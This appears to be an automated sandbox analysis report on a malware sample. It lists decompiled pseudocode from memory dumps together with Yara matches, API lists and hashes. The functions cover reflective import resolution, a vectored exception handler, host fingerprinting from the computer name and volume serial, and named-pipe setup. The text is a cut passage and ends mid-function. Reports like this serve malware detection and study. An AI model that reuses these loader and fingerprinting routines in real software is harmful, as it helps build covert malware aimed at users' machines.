                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 384173800-0
                                    • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                    • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                                    • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                    • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t13;
                                    				intOrPtr _t15;
                                    				signed int _t16;
                                    				intOrPtr _t17;
                                    				signed int _t18;
                                    				char _t20;
                                    				intOrPtr _t22;
                                    				void* _t23;
                                    				void* _t24;
                                    				intOrPtr _t29;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t48;
                                    				void* _t51;
                                    				signed int _t61;
                                    				signed int _t64;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t61 = __ecx;
                                    				_t41 =  *0x1001e6dc; // 0x0
                                    				_t13 = E1000A4BF(_t41, 0);
                                    				while(_t13 < 0) {
                                    					E1000980C( &_v28);
                                    					_t43 =  *0x1001e6e0; // 0x0
                                    					_t15 =  *0x1001e6e4; // 0x0
                                    					_t41 = _t43 + 0xe10;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t15 - _v24;
                                    					if(__eflags > 0) {
                                    						L9:
                                    						_t16 = 0xfffffffe;
                                    						L13:
                                    						return _t16;
                                    					}
                                    					if(__eflags < 0) {
                                    						L4:
                                    						_t17 =  *0x1001e684; // 0x797faa0
                                    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                                    						__eflags = _t18;
                                    						if(_t18 == 0) {
                                    							break;
                                    						}
                                    						_t35 =  *0x1001e684; // 0x797faa0
                                    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                    						_t41 =  *0x1001e6dc; // 0x0
                                    						__eflags = 0;
                                    						_t13 = E1000A4BF(_t41, 0);
                                    						continue;
                                    					}
                                    					__eflags = _t41 - _v28;
                                    					if(_t41 >= _v28) {
                                    						goto L9;
                                    					}
                                    					goto L4;
                                    				}
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t20 =  *0x1001e6e8; // 0x0
                                    				_v28 = _t20;
                                    				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                                    				_v20 = _t22;
                                    				if(_t22 != 0) {
                                    					_t23 = GetCurrentProcess();
                                    					_t24 = GetCurrentThread();
                                    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                                    					E1000980C(0x1001e6e0);
                                    					_t64 = E10001A1B( &_v28, E10001226, _t71);
                                    					__eflags = _t64;
                                    					if(_t64 >= 0) {
                                    						_push(0);
                                    						_push( *0x1001e760);
                                    						_t51 = 0x27;
                                    						E10009F06(_t51);
                                    					}
                                    				} else {
                                    					_t64 = _t61 | 0xffffffff;
                                    				}
                                    				_t29 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                                    				_t48 =  *0x1001e6dc; // 0x0
                                    				 *0x1001e6d0 = 0;
                                    				E1000A4DB(_t48);
                                    				E1000861A( &_v24, 0);
                                    				_t16 = _t64;
                                    				goto L13;
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                    • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                                    • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                    • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E10001B2D(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				void* _t12;
                                    				intOrPtr _t14;
                                    				void* _t15;
                                    				intOrPtr _t16;
                                    				void* _t17;
                                    				void* _t19;
                                    				void* _t20;
                                    				char _t24;
                                    				intOrPtr _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr _t46;
                                    				void* _t48;
                                    				intOrPtr _t51;
                                    				void* _t61;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t38 =  *0x1001e6f4; // 0x0
                                    				_t12 = E1000A4BF(_t38, 0);
                                    				while(_t12 < 0) {
                                    					E1000980C( &_v28);
                                    					_t40 =  *0x1001e700; // 0x0
                                    					_t14 =  *0x1001e704; // 0x0
                                    					_t41 = _t40 + 0x3840;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t14 - _v24;
                                    					if(__eflags > 0) {
                                    						L13:
                                    						_t15 = 0;
                                    					} else {
                                    						if(__eflags < 0) {
                                    							L4:
                                    							_t16 =  *0x1001e684; // 0x797faa0
                                    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                                    							__eflags = _t17;
                                    							if(_t17 == 0) {
                                    								break;
                                    							} else {
                                    								_t33 =  *0x1001e684; // 0x797faa0
                                    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                    								_t51 =  *0x1001e6f4; // 0x0
                                    								__eflags = 0;
                                    								_t12 = E1000A4BF(_t51, 0);
                                    								continue;
                                    							}
                                    						} else {
                                    							__eflags = _t41 - _v28;
                                    							if(_t41 >= _v28) {
                                    								goto L13;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    					}
                                    					L12:
                                    					return _t15;
                                    				}
                                    				E1000980C(0x1001e700);
                                    				_t19 = GetCurrentProcess();
                                    				_t20 = GetCurrentThread();
                                    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 =  *0x1001e6e8; // 0x0
                                    				_v28 = _t24;
                                    				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                                    				if(_t61 >= 0) {
                                    					_push(0);
                                    					_push( *0x1001e760);
                                    					_t48 = 0x27;
                                    					E10009F06(_t48);
                                    				}
                                    				if(_v24 != 0) {
                                    					E10006890( &_v24);
                                    				}
                                    				_t26 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                                    				_t28 =  *0x1001e758; // 0x0
                                    				 *0x1001e6ec = 0;
                                    				_t29 =  !=  ? 1 : _t28;
                                    				_t46 =  *0x1001e6f4; // 0x0
                                    				 *0x1001e758 =  !=  ? 1 : _t28;
                                    				E1000A4DB(_t46);
                                    				_t15 = _t61;
                                    				goto L12;
                                    			}

                                    APIs
                                    • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                                    • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                                    • DuplicateHandle.KERNEL32 ref: 10001BD9
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Current$Process$DuplicateHandleThread
                                    • String ID:
                                    • API String ID: 3566409357-0
                                    • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                    • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                                    • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                    • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 100%
                                    			E00085A61(void* __eflags) {
                                    				intOrPtr _t2;
                                    				void* _t6;
                                    				void* _t7;
                                    
                                    				_t2 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                                    				E00085631(_t6, _t7); // executed
                                    				return 0;
                                    			}

                                    APIs
                                    • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionHandlerVectored
                                    • String ID:
                                    • API String ID: 3310709589-0
                                    • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                                    • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                                    • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                                    • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                    				char _v516;
                                    				void _v1044;
                                    				char _v1076;
                                    				signed int _v1080;
                                    				signed int _v1096;
                                    				WCHAR* _v1100;
                                    				intOrPtr _v1104;
                                    				signed int _v1108;
                                    				CHAR* _v1112;
                                    				char _v1116;
                                    				void* __esi;
                                    				intOrPtr _t66;
                                    				CHAR* _t73;
                                    				signed int _t75;
                                    				intOrPtr _t76;
                                    				signed int _t80;
                                    				signed int _t81;
                                    				WCHAR* _t87;
                                    				void* _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				WCHAR* _t96;
                                    				CHAR* _t106;
                                    				void* _t108;
                                    				intOrPtr _t109;
                                    				signed char _t116;
                                    				WCHAR* _t118;
                                    				void* _t122;
                                    				signed int _t123;
                                    				intOrPtr _t125;
                                    				void* _t128;
                                    				void* _t129;
                                    				WCHAR* _t130;
                                    				void* _t134;
                                    				void* _t141;
                                    				void* _t143;
                                    				WCHAR* _t145;
                                    				signed int _t153;
                                    				void* _t154;
                                    				void* _t178;
                                    				signed int _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    				void* _t187;
                                    				signed int _t188;
                                    				WCHAR* _t190;
                                    				signed int _t191;
                                    				signed int _t192;
                                    				intOrPtr* _t194;
                                    				signed int _t196;
                                    				void* _t199;
                                    				void* _t200;
                                    				void* _t201;
                                    				void* _t202;
                                    				intOrPtr* _t203;
                                    				void* _t208;
                                    
                                    				_t208 = __fp0;
                                    				_push(_t191);
                                    				_t128 = __edx;
                                    				_t187 = __ecx;
                                    				_t192 = _t191 | 0xffffffff;
                                    				memset( &_v1044, 0, 0x20c);
                                    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                    				_v1108 = 1;
                                    				if(_t187 != 0) {
                                    					_t123 =  *0x9e688; // 0xf0000
                                    					_t125 =  *0x9e68c; // 0x12afab8
                                    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                    				}
                                    				if(E0008BB8D(_t187) != 0) {
                                    					L4:
                                    					_t134 = _t128; // executed
                                    					_t66 = E0008B7A8(_t134,  &_v516); // executed
                                    					_push(_t134);
                                    					_v1104 = _t66;
                                    					E0008B67D(_t66,  &_v1076, _t206, _t208);
                                    					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                                    					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                                    					E0008B88A(_t141,  &_v1100, _t208);
                                    					_t175 =  &_v1076;
                                    					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                                    					_v1112 = _t73;
                                    					_t143 = _t141;
                                    					if(_t73 != 0) {
                                    						_push(0);
                                    						_push(_t129);
                                    						_push("\\");
                                    						_t130 = E000892E5(_t73);
                                    						_t200 = _t199 + 0x10;
                                    						_t75 =  *0x9e688; // 0xf0000
                                    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                    							L12:
                                    							__eflags = _v1108;
                                    							if(__eflags != 0) {
                                    								_t76 = E000891E3(_v1112);
                                    								_t145 = _t130;
                                    								 *0x9e740 = _t76;
                                    								 *0x9e738 = E000891E3(_t145);
                                    								L17:
                                    								_push(_t145);
                                    								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                                    								_t188 = _t80;
                                    								_t201 = _t200 + 0x10;
                                    								__eflags = _t188;
                                    								if(_t188 == 0) {
                                    									goto L41;
                                    								}
                                    								_push(0x9b9ca);
                                    								E00089F48(0xe); // executed
                                    								E00089F6C(_t188, _t208, _t130); // executed
                                    								_t194 = _a4;
                                    								_v1096 = _v1096 & 0x00000000;
                                    								_push(2);
                                    								_v1100 =  *_t194;
                                    								_push(8);
                                    								_push( &_v1100);
                                    								_t178 = 0xb; // executed
                                    								E0008A0AB(_t188, _t178, _t208); // executed
                                    								_t179 =  *(_t194 + 0x10);
                                    								_t202 = _t201 + 0xc;
                                    								__eflags =  *(_t194 + 0x10);
                                    								if( *(_t194 + 0x10) != 0) {
                                    									E0008A3ED(_t188, _t179, _t208);
                                    								}
                                    								_t180 =  *(_t194 + 0xc);
                                    								__eflags = _t180;
                                    								if(_t180 != 0) {
                                    									E0008A3ED(_t188, _t180, _t208); // executed
                                    								}
                                    								_t87 = E0008980C(0);
                                    								_push(2);
                                    								_v1100 = _t87;
                                    								_t153 = _t188;
                                    								_push(8);
                                    								_v1096 = _t180;
                                    								_push( &_v1100);
                                    								_t181 = 2; // executed
                                    								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                                    								_t203 = _t202 + 0xc;
                                    								__eflags = _v1108;
                                    								if(_v1108 == 0) {
                                    									_t153 =  *0x9e688; // 0xf0000
                                    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                    										_t203 = _t203 + 0xc;
                                    										goto L26;
                                    									}
                                    									_t153 = _t153 + 0x228;
                                    									goto L25;
                                    								} else {
                                    									_t91 =  *0x9e688; // 0xf0000
                                    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										L32:
                                    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                    											_t183 = 0x64;
                                    											E0008E23E(_t183);
                                    										}
                                    										E000852C0( &_v1076, _t208);
                                    										_t190 = _a8;
                                    										_t154 = _t153;
                                    										__eflags = _t190;
                                    										if(_t190 != 0) {
                                    											_t94 =  *0x9e688; // 0xf0000
                                    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                    												lstrcpyW(_t190, _t130);
                                    											} else {
                                    												_t96 = E0008109A(_t154, 0x228);
                                    												_v1100 = _t96;
                                    												lstrcpyW(_t190, _t96);
                                    												E000885D5( &_v1100);
                                    												 *_t203 = "\"";
                                    												lstrcatW(_t190, ??);
                                    												lstrcatW(_t190, _t130);
                                    												lstrcatW(_t190, "\"");
                                    											}
                                    										}
                                    										_t93 = _a12;
                                    										__eflags = _t93;
                                    										if(_t93 != 0) {
                                    											 *_t93 = _v1104;
                                    										}
                                    										_t192 = 0;
                                    										__eflags = 0;
                                    										goto L41;
                                    									}
                                    									_t51 = _t91 + 0x228; // 0xf0228
                                    									_t153 = _t51;
                                    									L25:
                                    									_t90 = E0008553F(_t153, _t130, __eflags);
                                    									L26:
                                    									__eflags = _t90;
                                    									if(_t90 >= 0) {
                                    										_t91 =  *0x9e688; // 0xf0000
                                    										goto L32;
                                    									}
                                    									_push(0xfffffffd);
                                    									L6:
                                    									_pop(_t192);
                                    									goto L41;
                                    								}
                                    							}
                                    							_t106 = E0008C292(_v1104, __eflags);
                                    							_v1112 = _t106;
                                    							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                    							__eflags = _t108 - _t192;
                                    							if(_t108 != _t192) {
                                    								_t109 =  *0x9e684; // 0x12af8f0
                                    								 *((intOrPtr*)(_t109 + 0x30))();
                                    								E0008861A( &_v1116, _t192);
                                    								_t145 = _t108;
                                    								goto L17;
                                    							}
                                    							E0008861A( &_v1112, _t192);
                                    							_t81 = 1;
                                    							goto L42;
                                    						}
                                    						_t116 =  *(_t75 + 0x1898);
                                    						__eflags = _t116 & 0x00000004;
                                    						if((_t116 & 0x00000004) == 0) {
                                    							__eflags = _t116;
                                    							if(_t116 != 0) {
                                    								goto L12;
                                    							}
                                    							L11:
                                    							E0008E286(_v1112, _t175); // executed
                                    							goto L12;
                                    						}
                                    						_v1080 = _v1080 & 0x00000000;
                                    						_t118 = E000895E1(_t143, 0x879);
                                    						_v1100 = _t118;
                                    						_t175 = _t118;
                                    						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                    						E000885D5( &_v1100);
                                    						_t200 = _t200 + 0x14;
                                    						goto L11;
                                    					}
                                    					_push(0xfffffffe);
                                    					goto L6;
                                    				} else {
                                    					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                                    					_t206 = _t122;
                                    					if(_t122 == 0) {
                                    						L41:
                                    						_t81 = _t192;
                                    						L42:
                                    						return _t81;
                                    					}
                                    					goto L4;
                                    				}
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 00084A2D
                                    • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
                                    • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
                                    • lstrcatW.KERNEL32 ref: 00084D3D
                                    • lstrcatW.KERNEL32 ref: 00084D41
                                    • lstrcatW.KERNEL32 ref: 00084D49
                                    • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$CreateNamedPipememset
                                    • String ID:
                                    • API String ID: 2307407751-0
                                    • Opcode ID: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
                                    • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                                    • Opcode Fuzzy Hash: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
                                    • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0008B7A8(WCHAR* __ecx, void* __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				WCHAR* _v16;
                                    				short _v528;
                                    				short _v1040;
                                    				short _v1552;
                                    				WCHAR* _t27;
                                    				signed int _t29;
                                    				void* _t33;
                                    				long _t38;
                                    				WCHAR* _t43;
                                    				WCHAR* _t56;
                                    
                                    				_t44 = __ecx;
                                    				_v8 = _v8 & 0x00000000;
                                    				_t43 = __edx;
                                    				_t56 = __ecx;
                                    				memset(__edx, 0, 0x100);
                                    				_v12 = 0x100;
                                    				GetComputerNameW( &_v528,  &_v12);
                                    				lstrcpynW(_t43,  &_v528, 0x100);
                                    				_t27 = E000895E1(_t44, 0xa88);
                                    				_v16 = _t27;
                                    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                    				asm("sbb eax, eax");
                                    				_v8 = _v8 &  ~_t29;
                                    				E000885D5( &_v16);
                                    				_t33 = E0008C392(_t43);
                                    				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                    				lstrcatW(_t43, _t56);
                                    				_t38 = E0008C392(_t43);
                                    				_v12 = _t38;
                                    				CharUpperBuffW(_t43, _t38);
                                    				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 0008B7C5
                                    • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                                    • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                                    • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                                      • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                                    • lstrcatW.KERNEL32 ref: 0008B85A
                                    • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                    • String ID:
                                    • API String ID: 3410906232-0
                                    • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                                    • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                                    • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                                    • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0008CF84(void* __ecx) {
                                    				intOrPtr _t11;
                                    				long _t12;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				struct _OSVERSIONINFOA* _t29;
                                    
                                    				_push(__ecx);
                                    				_t29 =  *0x9e688; // 0xf0000
                                    				GetCurrentProcess();
                                    				_t11 = E0008BA05(); // executed
                                    				_t1 = _t29 + 0x1644; // 0xf1644
                                    				_t25 = _t1;
                                    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                    				_t33 = _t12;
                                    				if(_t12 != 0) {
                                    					_t12 = E00088FBE(_t25, _t33);
                                    				}
                                    				_t3 = _t29 + 0x228; // 0xf0228
                                    				 *(_t29 + 0x1854) = _t12;
                                    				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                                    				memset(_t29, 0, 0x9c);
                                    				_t29->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t29);
                                    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                    				_t17 = E0008E3B6(_t3);
                                    				_t7 = _t29 + 0x220; // 0xf0220
                                    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                    				_t18 = E0008E3F1(_t7); // executed
                                    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                    				return _t18;
                                    			}


                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,000F0000,?,00083545), ref: 0008CF90
                                    • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,00083545), ref: 0008CFB1
                                    • memset.MSVCRT ref: 0008CFE2
                                    • GetVersionExA.KERNEL32(000F0000,000F0000,?,00083545), ref: 0008CFED
                                    • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$FileModuleNameVersionmemset
                                    • String ID:
                                    • API String ID: 3581039275-0
                                    • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                                    • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                                    • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                                    • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E0009249B(signed int __eax, intOrPtr _a4) {
                                    				intOrPtr* _v8;
                                    				signed int* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				intOrPtr _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				struct HINSTANCE__* _v48;
                                    				intOrPtr _v52;
                                    				signed int _v56;
                                    				intOrPtr _v60;
                                    				signed int _v64;
                                    				signed int _t109;
                                    				signed int _t112;
                                    				signed int _t115;
                                    				struct HINSTANCE__* _t121;
                                    				void* _t163;
                                    
                                    				_v44 = _v44 & 0x00000000;
                                    				if(_a4 != 0) {
                                    					_v48 = GetModuleHandleA("kernel32.dll");
                                    					_v40 = E0008E099(_v48, "GetProcAddress");
                                    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    					_v32 = _v52;
                                    					_t109 = 8;
                                    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                    						L24:
                                    						return 0;
                                    					}
                                    					_v56 = 0x80000000;
                                    					_t112 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v8 = _v8 + 0x14;
                                    					}
                                    					_t115 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                    						_v36 = _t121;
                                    						if(_v36 != 0) {
                                    							if( *_v8 == 0) {
                                    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                    							} else {
                                    								_v12 =  *_v8 + _a4;
                                    							}
                                    							_v28 = _v28 & 0x00000000;
                                    							while( *_v12 != 0) {
                                    								_v24 = _v24 & 0x00000000;
                                    								_v16 = _v16 & 0x00000000;
                                    								_v64 = _v64 & 0x00000000;
                                    								_v20 = _v20 & 0x00000000;
                                    								if(( *_v12 & _v56) == 0) {
                                    									_v60 =  *_v12 + _a4;
                                    									_v20 = _v60 + 2;
                                    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                    									_v16 = _v40(_v36, _v20);
                                    								} else {
                                    									_v24 =  *_v12;
                                    									_v20 = _v24 & 0x0000ffff;
                                    									_v16 = _v40(_v36, _v20);
                                    								}
                                    								if(_v24 != _v16) {
                                    									_v44 = _v44 + 1;
                                    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                    										 *_v12 = _v16;
                                    									} else {
                                    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                    									}
                                    								}
                                    								_v12 =  &(_v12[1]);
                                    								_v28 = _v28 + 4;
                                    							}
                                    							_v8 = _v8 + 0x14;
                                    							continue;
                                    						}
                                    						_t163 = 0xfffffffd;
                                    						return _t163;
                                    					}
                                    					goto L24;
                                    				}
                                    				return __eax | 0xffffffff;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                                    • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID: GetProcAddress$kernel32.dll
                                    • API String ID: 4133054770-1584408056
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E00082EDA(void* __eflags) {
                                    				CHAR* _v12;
                                    				struct HINSTANCE__* _v32;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				void _v52;
                                    				char _v80;
                                    				char _v144;
                                    				intOrPtr _t25;
                                    				intOrPtr _t32;
                                    				struct HWND__* _t34;
